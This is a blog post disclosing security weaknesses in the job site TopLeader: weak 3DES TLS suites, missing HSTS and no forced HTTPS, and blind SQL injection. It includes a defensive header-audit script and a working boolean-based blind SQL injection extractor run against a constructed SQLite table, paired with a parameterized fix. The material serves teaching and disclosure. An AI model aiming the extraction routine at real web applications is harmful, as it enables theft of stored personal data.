Friday, July 07, 2017

[Full Disclosure] TopLeader Is Vulnerable To SQL Injection

Recently, a new local TV advertisement caught my eye: a job-hunting website called TopLeader.

As an information security guy, I was curious to see how secure the website is, so I ran a very quick and simple test on it. This was only reconnaissance; I did not hack it.

The site stores employer, customer and agency information, yet it does not use HTTPS by default. Its TLS/SSL configuration also offers weak cipher suites, such as TLS_RSA_WITH_3DES_EDE_CBC_SHA, TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA and TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA (3DES has a 64-bit block and is subject to the Sweet32 birthday attack).

The site sends a Cross Site Scripting (XSS) protection header, but no other security headers at all, in particular no HTTP Strict Transport Security (HSTS). Together with plain HTTP being the default, this leaves users open to a Man-In-The-Middle (MITM) attack: an attacker on the network path can keep a victim on unencrypted HTTP and read or alter the traffic.
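As an added example (not from the original post and not TopLeader's code), the following Python script audits a captured HTTP response and a list of offered cipher suites for the two transport findings above: no redirect to HTTPS and no HSTS or other security headers, and 3DES cipher suites still enabled. The response, cookie name, server banner and cipher list are constructed to mirror the findings; they are assumptions, not captures from the site. In practice you would feed in the output of `curl -si http://<host>/` and `nmap --script ssl-enum-ciphers -p 443 <host>`.

```python
import re

# Constructed sample: a plain-HTTP response from a site that does not force
# HTTPS and, as in the post, sends an XSS-filter header but nothing else.
# Server banner, cookie name and body are invented.
HTTP_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "X-XSS-Protection: 1; mode=block\r\n"
    "Set-Cookie: JSESSIONID=abc123; Path=/\r\n"
    "\r\n"
    "<html>...</html>"
)

# Constructed sample: the three 3DES suites named in the post plus two sound
# AES-GCM suites, roughly what a cipher enumeration would list.
OFFERED_SUITES = [
    "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
    "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384",
    "TLS_RSA_WITH_3DES_EDE_CBC_SHA",
    "TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA",
    "TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA",
]

# Headers a site holding account data is expected to send.  HSTS is the one
# that matters for the MITM argument; the rest are defence in depth.
EXPECTED_HEADERS = (
    "Strict-Transport-Security",
    "Content-Security-Policy",
    "X-Frame-Options",
    "X-Content-Type-Options",
)

# Substring of an IANA suite name -> why it is weak (first match is reported).
WEAK_SUITE_PATTERNS = {
    "3DES": "64-bit block cipher, Sweet32 birthday attack",
    "RC4": "broken stream cipher",
    "_NULL_": "no encryption",
    "EXPORT": "export-grade key size",
    "_DES_": "56-bit single DES",
    "anon": "no server authentication",
    "_MD5": "MD5-based MAC",
}


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status_code, headers, body).
    Header names are lower-cased; repeated headers (Set-Cookie) become a list."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers, body


def audit_headers(raw):
    """Return the transport-security findings for one response."""
    status, headers, _ = parse_response(raw)
    location = headers.get("location", [""])[0]
    forces_https = status in (301, 302, 307, 308) and location.lower().startswith("https://")

    # Browsers only honour HSTS on an HTTPS response, so run this on the
    # https:// response as well; absence on either is reported the same way.
    hsts_max_age = None
    for value in headers.get("strict-transport-security", []):
        m = re.search(r"max-age=(\d+)", value, re.IGNORECASE)
        if m:
            hsts_max_age = int(m.group(1))

    missing = [h for h in EXPECTED_HEADERS if h.lower() not in headers]

    # Session cookies without Secure travel over the plain-HTTP default too.
    cookie_issues = []
    for cookie in headers.get("set-cookie", []):
        name = cookie.split("=", 1)[0].strip()
        attrs = {a.strip().lower() for a in cookie.split(";")[1:]}
        lacking = [f for f in ("Secure", "HttpOnly") if f.lower() not in attrs]
        if lacking:
            cookie_issues.append(f"{name}: missing {', '.join(lacking)}")

    return {
        "forces_https": forces_https,
        "hsts_max_age": hsts_max_age,
        "missing_headers": missing,
        "cookie_issues": cookie_issues,
    }


def mitm_exposed(findings):
    """SSL stripping works when the first request may stay on HTTP (no redirect)
    or the browser has no HSTS entry with which to upgrade it by itself."""
    return not findings["forces_https"] or findings["hsts_max_age"] is None


def weak_suites(suites):
    """Return [(suite, reason)] for every offered suite matching a weak pattern."""
    flagged = []
    for suite in suites:
        for pattern, reason in WEAK_SUITE_PATTERNS.items():
            if pattern in suite:
                flagged.append((suite, reason))
                break
    return flagged


if __name__ == "__main__":
    f = audit_headers(HTTP_RESPONSE)
    print("forces HTTPS:", f["forces_https"], "| HSTS max-age:", f["hsts_max_age"])
    print("missing headers:", ", ".join(f["missing_headers"]))
    print("cookie issues:", "; ".join(f["cookie_issues"]))
    print("MITM / SSL-strip exposed:", mitm_exposed(f))
    for suite, reason in weak_suites(OFFERED_SUITES):
        print(f"weak suite {suite}: {reason}")
```

The fix on the server side is the mirror image of the audit: answer every plain-HTTP request with a 301 to the https:// URL, send Strict-Transport-Security with a long max-age on the HTTPS response, mark session cookies Secure and HttpOnly, and remove the 3DES suites from the TLS configuration.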

In addition, many URLs of the site are vulnerable to blind SQL injection (SQLi): the pages show nothing of the query output directly, but an attacker can still pull the stored data out of the database one yes/no question at a time, so there is a real risk of that data being leaked to the public.
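As a generic, added illustration of the bug class (not the post's own findings and not TopLeader's code; the table, columns, sample rows and query are invented), the following Python script shows how a boolean-based blind SQL injection turns a handler that only answers "found" or "not found" into a data-extraction oracle, and how parameter binding closes it. It runs against an in-memory SQLite database with constructed data.

```python
import sqlite3


def setup_db():
    """Constructed sample data: an employer table with contact addresses that
    the application never displays to the public."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE employer (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO employer (name, email) VALUES (?, ?)",
        [("Acme Ltd", "hr@acme.example"), ("Globex", "jobs@globex.example")],
    )
    return conn


def employer_exists_vulnerable(conn, employer_id):
    """The 'before': the ?id= parameter is pasted into the SQL text.  The
    handler returns only True/False, so nothing is echoed back; the boolean
    itself is the leak that blind injection exploits."""
    sql = f"SELECT 1 FROM employer WHERE id = {employer_id}"
    return conn.execute(sql).fetchone() is not None


def employer_exists_fixed(conn, employer_id):
    """The fix: the value is bound as a parameter and the SQL text never
    changes, so 'id' can only ever be compared, never executed."""
    row = conn.execute("SELECT 1 FROM employer WHERE id = ?", (employer_id,)).fetchone()
    return row is not None


def blind_extract(oracle, subquery, known_id=1, max_len=64):
    """Recover the string value of `subquery` using only a yes/no oracle.

    `oracle(payload)` must return True when the injected condition holds.
    `subquery` is a scalar SQL expression the attacker wants to read, e.g.
    "(SELECT email FROM employer WHERE id = 1)".  Each character is found by
    binary search over its code point: about 7 questions per character.
    """
    result = ""
    for pos in range(1, max_len + 1):
        # First ask whether the string even has a character at this position.
        if not oracle(f"{known_id} AND length({subquery}) >= {pos}"):
            break
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"{known_id} AND unicode(substr({subquery}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    conn = setup_db()
    target = "(SELECT email FROM employer WHERE id = 1)"
    leaked = blind_extract(lambda p: employer_exists_vulnerable(conn, p), target)
    print("vulnerable handler leaked:", repr(leaked))
    blocked = blind_extract(lambda p: employer_exists_fixed(conn, p), target)
    print("fixed handler leaked:", repr(blocked))
```

The extraction never sees a database error or a row of output; it only watches whether the page behaves as "found" or "not found", which is why a site can be fully readable through blind SQLi while looking harmless in the browser. Against the parameterized handler the first length probe is compared as a literal string to the integer id, fails, and the loop ends with nothing.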

I informed the webmaster of the above findings through the website's "Contact Us" form on June 30, 2017, but received no reply within 7 days. I therefore decided on public disclosure to warn other employers and customers not to trust this site, as it exposes their information.

Disclosure Timeline

2017-06-30 - Message sent to the webmaster via the website's contact form describing the above findings.
2017-07-07 - No reply from the webmaster; public disclosure.
2017-07-12 - The SQL injection is fixed, but the other issues are not. Information held by the site before 2017-07-12 may already have been leaked to the public.

That's all! See you.